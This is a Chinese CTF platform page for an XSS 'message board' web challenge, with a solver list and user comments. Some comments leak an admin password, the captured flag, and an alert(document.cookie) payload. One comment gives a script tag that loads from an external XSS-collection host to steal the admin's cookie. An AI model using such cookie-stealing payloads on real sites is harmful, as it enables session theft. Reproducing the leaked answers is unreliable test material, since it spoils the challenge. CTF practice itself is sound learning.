留言板WEB 未解决
分数:
10
金币:
3
题目作者:
harry
一 血:
꧁༺༽༾ཊ彪ཏ༿༼༻꧂
一血奖励:
5金币
解 决:
3421
提 示:
题目无需登录后台!需要xss平台接收flag
描 述:
http协议需要http协议的xss平台
评分(19)
解题动态
关灯吃面 攻破了该题 32分钟前
cenyo 攻破了该题 6小时前
billy856 攻破了该题 2天前
fi1y 攻破了该题 4天前
imhacker 攻破了该题 4天前
曦羽 攻破了该题 6天前
等往事风中吹‘ 攻破了该题 6天前
dwx386572657 攻破了该题 7天前
luobosir 攻破了该题 7天前
WW12@ 攻破了该题 8天前
ChatFaro 攻破了该题 9天前
1546546 攻破了该题 9天前
一世温华 攻破了该题 11天前
hull-p 攻破了该题 15天前
凯哥 攻破了该题 15天前
lvchijing 攻破了该题 15天前
baizhi白栀 攻破了该题 16天前
星落. 攻破了该题 17天前
13822005976 攻破了该题 17天前
评论
sisa 3年前
举报
dirmap、dirsearch、dirb都扫不出sql文件,看wp直接访问db.sql得到是The requested URL was not found on this server.真不知你们是怎么知道密码的?
safeweb20 3年前
举报
这道题通过dirsearch.py 扫描网址找到sql账号数据之后登录admin账户,通过xss注入可以找到flag, 管理员密码是011be4d65feac1a8 账户是admin xss可以使用<script>alert(document.cookie);</script>
bigbox1 3年前
举报
这个题有问题,管理员密码是011be4d65feac1a8,作者把那个文件删了应该是,那个登录框不是sql注入
sshui 3年前
举报
nmd,改题了也不及时说明。凸(艹皿艹 )
admin999 3年前
举报
XSS插进图片了,不过好像收不到flag啊?
sshui 3年前
举报
@admin999 找后台
admin999 3年前
举报
@sshui 所以这题现在怎么做...
sshui 3年前
举报
改题了
anguilin 3年前
举报
沙比题
Striker123456 3年前
举报
尖括号字体实体,双引号转义,src自动加上http://。这怎么做?
b1lld 3年前
举报
我说你们这些网站出题人是在干嘛啊?新手题官方wp写的那么简短,能缩写就整缩写,突出的就是一个边看文章边查才能体现你的深度是吧?一道入门题硬是要查几篇博客一顿查是吧?一道题本来好不容易搜到几篇wp能看的,咔咔一顿操作,做到一半发现原来的做题思路行不通了,哦,看下评论,题目改了。我说你们是在干嘛啊????新手题诶???建这个网站的目的不是让人学习吗??不是为了让人入门吗???不是为了让人按照一个思路去
anguilin 3年前
举报
咋做
skiller 3年前
举报
db.sql是怎么搜出来的?我用dir没搜出来啊?
BugKugirl 3年前
举报
在线XSS平台(https://xss.pt/)生成xss代码(<sCRiPt sRC=//0x.ax/AUBv></sCrIpT>)放到留言板,xss平台直接获得cookie : flag=flag%7Bf7784e4107be555d08be73ac01569c6f%7D,将flag进行url解码(http://www.jsons.cn/urlencode)